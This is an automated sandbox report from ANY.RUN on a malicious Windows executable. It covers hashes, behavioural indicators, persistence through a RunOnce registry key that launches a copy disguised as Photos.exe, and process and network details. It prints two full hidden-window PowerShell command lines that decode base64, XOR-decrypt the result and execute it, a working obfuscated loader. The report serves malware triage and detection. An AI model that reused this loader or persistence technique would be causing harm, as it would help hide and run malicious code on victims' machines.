File name:

8QivM1I.exe

Full analysis: https://app.any.run/tasks/790a6ed9-9d5a-434e-92f3-b78b2357ccf8
Verdict: Malicious activity
Analysis date: May 10, 2025, 06:11:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
susp-powershell
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 10 sections
MD5:

D3884CC519C6855AE20D64264D5F6E93

SHA1:

B901E328769D626FF997AF4C10D058CD8D677235

SHA256:

CDFE71F5F359BE56FC6FB2B5BFA6C34042CD2E6114A82FA0C3B147106E731D6A

SSDEEP:

98304:UnmD5KynJIkx1bZunPzXpZ4NyiG3lfcFg4QHv80qLFLsFTftcGp5i5GnUrLASB/q:iLai

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • 8QivM1I.exe (PID: 5352)
      • 8QivM1I.exe (PID: 7308)
      • Photos.exe (PID: 8016)
      • Photos.exe (PID: 5072)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7440)
      • powershell.exe (PID: 4976)
      • powershell.exe (PID: 7376)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 616)
  • SUSPICIOUS

    • Starts NET.EXE to display or manage information about active sessions

      • 8QivM1I.exe (PID: 5352)
      • net.exe (PID: 6480)
      • 8QivM1I.exe (PID: 7308)
      • net.exe (PID: 7352)
      • Photos.exe (PID: 8016)
      • net.exe (PID: 8048)
      • Photos.exe (PID: 5072)
      • net.exe (PID: 7192)
    • Executable content was dropped or overwritten

      • 8QivM1I.exe (PID: 5352)
      • 8QivM1I.exe (PID: 7308)
    • Reads security settings of Internet Explorer

      • 8QivM1I.exe (PID: 5352)
      • Photos.exe (PID: 8016)
    • Reads the date of Windows installation

      • 8QivM1I.exe (PID: 5352)
      • Photos.exe (PID: 8016)
    • Application launched itself

      • 8QivM1I.exe (PID: 5352)
      • Photos.exe (PID: 8016)
    • BASE64 encoded PowerShell command has been detected

      • 8QivM1I.exe (PID: 7308)
      • Photos.exe (PID: 5072)
    • Starts POWERSHELL.EXE for commands execution

      • 8QivM1I.exe (PID: 7308)
      • Photos.exe (PID: 5072)
    • The process bypasses the loading of PowerShell profile settings

      • 8QivM1I.exe (PID: 7308)
      • Photos.exe (PID: 5072)
    • Base64-obfuscated command line is found

      • 8QivM1I.exe (PID: 7308)
      • Photos.exe (PID: 5072)
    • Executes script without checking the security policy

      • powershell.exe (PID: 7440)
      • powershell.exe (PID: 4976)
      • powershell.exe (PID: 7376)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 6540)
      • powershell.exe (PID: 616)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7440)
      • powershell.exe (PID: 4976)
  • INFO

    • Checks supported languages

      • 8QivM1I.exe (PID: 5352)
      • 8QivM1I.exe (PID: 7308)
      • Photos.exe (PID: 8016)
      • Photos.exe (PID: 5072)
    • Creates files or folders in the user directory

      • 8QivM1I.exe (PID: 5352)
    • Auto-launch of the file from Registry key

      • 8QivM1I.exe (PID: 5352)
      • 8QivM1I.exe (PID: 7308)
      • Photos.exe (PID: 8016)
      • Photos.exe (PID: 5072)
    • Process checks computer location settings

      • 8QivM1I.exe (PID: 5352)
      • Photos.exe (PID: 8016)
    • Reads the computer name

      • 8QivM1I.exe (PID: 5352)
      • Photos.exe (PID: 8016)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7440)
      • powershell.exe (PID: 4976)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7440)
      • powershell.exe (PID: 4976)
    • Manual execution by a user

      • Photos.exe (PID: 8016)
    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • 8QivM1I.exe (PID: 7308)
      • Photos.exe (PID: 5072)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • 8QivM1I.exe (PID: 7308)
      • powershell.exe (PID: 7440)
      • Photos.exe (PID: 5072)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:08 18:06:00+00:00
ImageFileCharacteristics: Executable, No line numbers, No symbols, Large address aware, No debug
PEType: PE32+
LinkerVersion: 2.44
CodeSize: 214016
InitializedDataSize: 3863040
UninitializedDataSize: 1024
EntryPoint: 0x13d0
OSVersion: 4
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
165
Monitored processes
31
Malicious processes
4
Suspicious processes
6

Behavior graph

Click at the process to see the details
start 8qivm1i.exe net.exe no specs conhost.exe no specs net1.exe no specs 8qivm1i.exe net.exe no specs conhost.exe no specs net1.exe no specs powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe photos.exe net.exe no specs conhost.exe no specs net1.exe no specs photos.exe net.exe no specs conhost.exe no specs net1.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
616"powershell" -NoP -W Hidden -E $ c f g _ m Z V d H w = " F Q I N P x h l Y C M l F g d D E T J 0 C x Y B c z U V Z R d T E W A T W i o 2 B z 4 F E g 1 j I T k 1 V h c A d G c r C F 4 f B n c v J R s D L h M k Y S 1 D E i I L W T x 1 L z k Y A 2 x W E w s T A x A x X V w N d x V i E 2 c P H x E + F 0 M s J l U a E y 5 2 O i A D D w E Q O g N R K g x z A Q Z 3 G T w a Z G g N J j g t e x k c c 1 M W A C c + J h d o M i t h K V o S L W Q Z B R I R B x s M F x Q 7 G z Z R H V d k G Q U S D W I O A W A P E z 4 X X C w m c x 4 N H S s l G w N s D S c b C 0 A r I m Q T O w 0 o N R Q T H x w T Y g N e L C J V D R M T F S c j D B 9 X K A Q D Q w E i c B 8 W B h E o J w w X A C g W N Q M s J n N T F g B 2 P i Y t a D Y r P j F a E V Z j D Q p 2 L y g m E w 8 S P j 8 L X i o I Y B w 9 E g E n C x M b E z s Q E 1 w S C F Y M B n Q R A x Q t G F 8 7 E B N D L D J K G Q Y C d z U b E 2 0 B O B s P A y t U C 1 k 8 E y 8 6 I Q w D P j s X c V E C I g d b P Q I 7 N S A 9 G w E Q O g B d E j I H W A d 3 J 2 A g Z w g B I g A A X S o L Z B k 9 A g E n C x M b E z s b J V k p M k o G F g Y k O R t m A w g q Y 3 B d H A 5 e J w 4 8 d h Y g Z w 8 T F h A A Q h J W Y w 0 S B g I m G w N s D T s Q c E M q V m M N F Q I N P x h l Y A w k F Q N u A z Z w X Q Y C d z U I H B d T E W J 4 B S s z X g I 8 H R k K C x B p A T g U D 1 s S V A s k B Q B 2 G B Y R F w Q 4 G w 8 D K 1 Q L A Q x 2 L 2 I O P 2 w K F x s Q W Q U m R Q 0 V A g 0 / G G V g K C g W d H w c I H 8 f D n d 6 Y y A 6 C B Y q B A N D A S J w H x Y G E T g m H D E A J 2 I L b x l X a w 0 P F g E a G A w I E i d h D 1 k S M m B b P Q I V O R Q T H x w T K g B C H i J 0 E D 5 0 A T o m E z 4 B O B s P A y t U C 1 k 8 E y 8 6 I Q w D P i s U d V E R I g Y N P h I a N Q k X C w w W G y l Q H V R 4 M w 5 3 G i c T Z m B X E D 0 Q U Q Q y V l o W A Q I i C x w t A R A 6 A F 0 R V 2 g E B 3 c N B x c S O g E i A A B d E V Z g X g d 0 D Q E V E R c L J S o T T C 0 9 f A w F A D d n J h d s K S g L K Q Y D I X M Z F g Y R O C Y c M Q A n Y g t v G V d r H w 5 3 e m M g O g g W K g Q D Q w E i c B 8 W B h E + I D o D A C h g G 0 A s J n N T F g I v P w s X P g 0 r Y R t Y E F d 8 P w o D I C c Q E w 8 c K 2 A L R i s t Y B o 9 d 3 c i C x w q A T g U D 1 s S V A s A C Q M B C g 4 / C w o R Y Q 9 P K T 1 w W j 4 S e i c L H G k B K A Q 5 T B I 2 c F 0 W B i U 7 L R 0 Y C D s b c F E q D H A N P S w B a w s T D x U R Y R R R L V d w H x Y G E T g Y O T 0 A J g Q T e R s w S i 4 W A X M 1 C B M X C y h i e H g S I A c g C w A O N S Q X G z 4 T F B d P E j Y D O g Y o M z 4 b Z w g B F y o A X R A c c x 4 9 K B Y 1 C B w X U x F i e A U r M 1 4 C P B 0 Z C g s c a A E Q O g N R K g x w U w Y C d z U k A x s T O x Q t W w E m V Q E G d x k 8 G m Y X M y c V I k Y B L U Y N P S w C O R t m A w g q Y i U G K 1 U H I Q k s A m s L E W w K F i p w Y h F X W g Y F D R U h G A M L M y s L D 0 Q Z M n x a P h J 6 J w s X a C A X F B d c L D 1 g B h Y G J x Y N O C E w E W E X T y t U S g I F A n I i I D g h J B E b A 3 M R P W A C B w A 7 J B t m H x U q F Q N e E V d G A g V 3 F S g a E W g W K 2 A L Q C t X C w c 7 B n Y K I w N s D R B g J U w E C X A F P X Y R J C F l Y R 8 W Y R d E L T J 4 A B A R K z s b O j 0 K K h Q P X h F X W g Y H A w E 9 I G c L E B E q d F o t I m c E B g J 3 N R s T b Q E 4 F B d D L A k L H j w u d j 4 W Z D Y B I g A A W R p X Z F o T E B E 6 J h M M F j 4 4 B 1 0 S I G A C O h 0 O P Q 8 H M h M g F A c G E j Y H K A U C E R s g Z w 8 f E S o m T g Y m W R 8 O E h E 5 F g M 1 E x Y L E 1 o r H F V a E A Y v N S A 9 G w E Q O g B d E j I H W A d 1 d i I b O D U y I S o A D w E g B w Y 7 P H I G G 2 Y x C i g b F 0 U S M m A / B h 0 N I B Q c E x Y o Y S V a K w x z H g 0 C B S I g H D I B P g Y H B g E m Y A Y 9 K x k 0 I A w T K S g G e H 0 R I g Y N B g J 3 N Q g c F 1 M R Y n h Z E Q t e P x Y B c z U W O Q 9 V P g U P X C k i Z A E 7 E j s + G B I L D h F h N W c r C F 4 f B n c v J R s D L g E + B R d M E j 1 4 I A U G A j k b Z g M I K m M T b x k y B w I G E y w 1 D g E h E C h h e E M e L V 4 d B R Y B G C A 6 C w o R P g d c L C J e W A U W A i Y X O g 8 T J h Q X B B I y R Q 0 M A i 8 8 I x M P H B Y U A 0 M B I n A f F g Y R K C c M F w A o P S 0 H K R x z U x Y A d j 4 m L W g y K 2 E p W h I t Z B k F E h E H G w w X F C d h F w Y s I l 4 f B X Y N B h g M C A E + B g d F K i I L W Q p 2 E T o h O g s s K D h 4 Q x k I d F o 7 A h U r I w M P H D s Q c H M q V w d a C n Y R J C E R N Q s g Y X h G K g h W O j 0 u C T o m H A s K E T 4 t W i s c c x 4 K d h E 6 I T o L P h M U F 0 M Z P W g C P h I 7 O h s 5 I Q o 7 E H B / K T J g A Q U S d j U g P R s B E D o A X S t W X h A H d x l n J g M q E y A L K V o R V m R a P h J 6 J x Q T N R I o B j l G K j J e W h Y B c z U I Z R s z P x U M W B E i B g 0 G A n c 1 C B w X U x F i e F s t P W Q Y E y 4 F I S A T Y F U h F A d P E i N g B j w o c i I g O R 9 W K A A A D w E m Y A c G E j s o G A M b E z s U A 0 M B J m A Q O h 0 N N B g 6 N V c T K n R l E j 1 8 W g Y d C W I R A 2 x W K A s L B B E y R Q 0 P F g I 8 F x I I H D 8 W c V g R I g Y N B g J 3 N Q g c F 1 M R Y n h b L T 1 k G B M p C T 4 h Z w s O E T 0 T c i p W Z B 8 7 B g J r C x A I U i s U d V E R I g Y N F Q 0 N Z y F l Y A s X C x d E B A l 8 W g Y d C W I U Z j E K E D g H B B E y X h k G E g k h G A c Y X z s Q E w Y r C 2 Q G B g J 3 N R s T b Q E 4 G w 8 D K 1 Q L B z o d F S A O O D 0 O E 2 E X Y y p U e F s 9 L A J r C x c L V h E 9 F 1 o R I g Y N B g J 3 N Q g c F 1 M R Y n h b L T 1 k G B M u B S E g E 2 B V I B Q X Q h E y B w E K d h E 6 I T o I A S I A A F 0 S C H Q Z P H c V N S A 9 G w E Q O g B d E j I H W A d 0 K x A Y Z B c X J z o A D w E m e w E U B h E 4 G D k 9 A C t i E 2 c e H A c / B h 0 N I B Y 5 H x I o A C 9 f J y x z A w Y C d z U b E 2 0 B J z 4 X W C k 9 f F o F H Q o m F 2 Y X C S g E E w c q I m Q B C Q I F K C M t G B I j B A 8 G K T I L H x Y G E T g Y O T 0 A J G A T T B w O Q j 0 W B n I H I T k 1 C C h h F 0 8 B J m A G P S s Z N B Y 5 N Q 8 l B Q 9 6 A S Y D O z w o L y c b Z j U R K w Q 2 U Q I t f F 8 8 d H o 9 G z o 1 M z s Q c G I S P W B a P h J 2 P C E t G A 0 R Y C 1 M E F d o X z s S M D U O A g s O E W E 1 e R E y A w Y W B h E + I D o D A C U W B 1 g Z V 0 I 5 F g Z y B x s M F x Q n F A c G K S Z z A T x 2 L y g a Z z 0 e J Q Q H T i w J U Q 0 T E B E + I W Y X H x M L A w Y p M g s f F g Y R P i A 6 A w A o Y B t A L C Z z H g 0 o e i s b Z g 8 B E D o D U S o M c F M = " ; $ c t x _ a S G d h F S = " _ E C R B T Y f r S A 6 H e 2 j " ; $ c f g _ o J X I t = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ c f g _ m Z V d H w ) ;   $ d a t a _ Y O l c = " " ;   f o r ( $ c t x _ D Z n V = 0 ;   $ c t x _ D Z n V   - l t   $ c f g _ o J X I t . L e n g t h ;   $ c t x _ D Z n V + + )   {   $ d a t a _ Y O l c + = [ c h a r ] ( c f g _ o J X I t [ $ c t x _ D Z n V ] - b x o r [ b y t e ] c t x _ a S G d h F S [ $ c t x _ D Z n V % c t x _ a S G d h F S . L e n g t h ] ) ;   } ;   $ c m d = [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ d a t a _ Y O l c ) ) ;   $ c f g _ D Q p a s = [ s c r i p t b l o c k ] : : c r e a t e ( $ c m d ) ;   &   $ c f g _ D Q p a s C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePhotos.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
896C:\WINDOWS\system32\net1 sessionC:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Net Command
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\samcli.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
1616\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2320\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4180C:\WINDOWS\system32\net1 sessionC:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\samcli.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\srvcli.dll
4976"powershell" -NoP -W Hidden -E JABkAGEAdABhAF8AdABCAEEARwBtAHEATgA9ACIAWQBHAFEAagBHAHoAVgBBAEMAVABvAFgAUABRAEkAUQBhADMARQB2AEwAbABZAHUATQB3AFEAMABIAFQAdwBpAEkAUgBzAEcAQwBXAGcAVQBBAFMAZAA4AEYARQBBAHgATgBVAE0AOABmAHkAQQBpAEgAaABOAFcAQgBnAEUAawBWAG0AUQBnAEYAQgB4AFgAYQBRAG8AZwBSADMAawBTAGEAeABSAE0AUAAzAHcAUwBOAHgAZwBNAGIAVwBrAEEASQBUAE0ASwBIADIAZwBVAEkAegBoAFcATwBpAGMARwBEAHgAdwBOAEsAUQA0AGcASABsAEoAcgBjAFEARgBsAFYAbQBVAGQAQgBUAFIAQwBHAGkAWQBtAE0AaQA4AEIAZQBEAG8AZABFAEgAbwA3AEMAUwBVADEASABBADQAMwBJAFUAUQB3AEQAbQBnAEUAUwBDAFIAWABQAGgASQBkAEgARgBjAFoATwBoAFEAWQBIAGgAOQByAEsAagBzAEgAVQBRAEIARQBNAFQAVgBYAEcAVABvAFUAUgB5AFEAVABhAEEAUgBBAFoAMgBCAGsASQAwAFkAMABhAFEAMABwAEUAVABJAGsARABXAGcARQBMAHkARQA9ACIAOwAkAGMAZgBnAF8AdABWAHoASgBMAD0AIgA1AFcAcQBzAFYALgBYAE4AQgB1AEgAZgAyAEMAeQBUACIAOwAkAGQAYQB0AGEAXwBCAEoARQBuAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQB0AGEAXwB0AEIAQQBHAG0AcQBOACkAOwAgACQAYwB0AHgAXwByAFQAVwBjAG8AQwBTAD0AIgAiADsAIABmAG8AcgAoACQAZABhAHQAYQBfAEkAbQBFAGkAPQAwADsAIAAkAGQAYQB0AGEAXwBJAG0ARQBpACAALQBsAHQAIAAkAGQAYQB0AGEAXwBCAEoARQBuAC4ATABlAG4AZwB0AGgAOwAgACQAZABhAHQAYQBfAEkAbQBFAGkAKwArACkAIAB7ACAAJABjAHQAeABfAHIAVABXAGMAbwBDAFMAKwA9AFsAYwBoAGEAcgBdACgAZABhAHQAYQBfAEIASgBFAG4AWwAkAGQAYQB0AGEAXwBJAG0ARQBpAF0ALQBiAHgAbwByAFsAYgB5AHQAZQBdAGMAZgBnAF8AdABWAHoASgBMAFsAJABkAGEAdABhAF8ASQBtAEUAaQAlAGMAZgBnAF8AdABWAHoASgBMAC4ATABlAG4AZwB0AGgAXQApADsAIAB9ADsAIAAkAGMAbQBkAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGMAdAB4AF8AcgBUAFcAYwBvAEMAUwApACkAOwAgACQAYwBmAGcAXwBLAGEASQBaAD0AWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAkAGMAbQBkACkAOwAgACYAIAAkAGMAZgBnAF8ASwBhAEkAWgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePhotos.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
5072"C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Photos_2wekybc98bbwe\cache\Photos.exe" C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Photos_2wekybc98bbwe\cache\Photos.exe
Photos.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\appdata\local\packages\microsoft.windows.photos_2wekybc98bbwe\cache\photos.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
5352"C:\Users\admin\AppData\Local\Temp\8QivM1I.exe" C:\Users\admin\AppData\Local\Temp\8QivM1I.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\8qivm1i.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
5892\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6480"net" sessionC:\Windows\System32\net.exe8QivM1I.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
27 692
Read events
27 688
Write events
4
Delete events
0

Modification events

(PID) Process:(5352) 8QivM1I.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:Uninstall 28.028.0197.0001
Value:
C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Photos_2wekybc98bbwe\cache\Photos.exe
(PID) Process:(7308) 8QivM1I.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:Uninstall 28.028.0197.0001
Value:
C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Photos_2wekybc98bbwe\cache\Photos.exe
(PID) Process:(8016) Photos.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:Uninstall 28.028.0197.0001
Value:
C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Photos_2wekybc98bbwe\cache\Photos.exe
(PID) Process:(5072) Photos.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:Uninstall 28.028.0197.0001
Value:
C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Photos_2wekybc98bbwe\cache\Photos.exe
Executable files
2
Suspicious files
2
Text files
16
Unknown types
0

Dropped files

PID
Process
Filename
Type
616powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_al3jgiea.c2r.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
73088QivM1I.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_4wekybc58bbwe\opt83\NarratorQuickStart.exeexecutable
MD5:7FDE98A13CC16C959BDE2400038DA6AF
SHA256:7C7E8BB992F47F545AB9DD884982BFD4E1DFA41C8191ECDA031DDE13A6623800
7440powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cldo2mxx.wqf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7752powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ozebqr2.qmb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7752powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_iee1vnae.kyr.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
53528QivM1I.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Photos_2wekybc98bbwe\cache\Photos.exeexecutable
MD5:D3884CC519C6855AE20D64264D5F6E93
SHA256:CDFE71F5F359BE56FC6FB2B5BFA6C34042CD2E6114A82FA0C3B147106E731D6A
7440powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dsmikemq.xqv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7440powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1w1yvg4a.nll.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7440powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:3F95A05381C6D14195F6A1538F5FBADE
SHA256:0E753E9AD3EDE811C17D076B462F85321B8F559C2E462AF0990A1653573A525F
7440powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_23vreu2d.3db.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2104
svchost.exe
GET
304
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7696
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7696
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4932
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
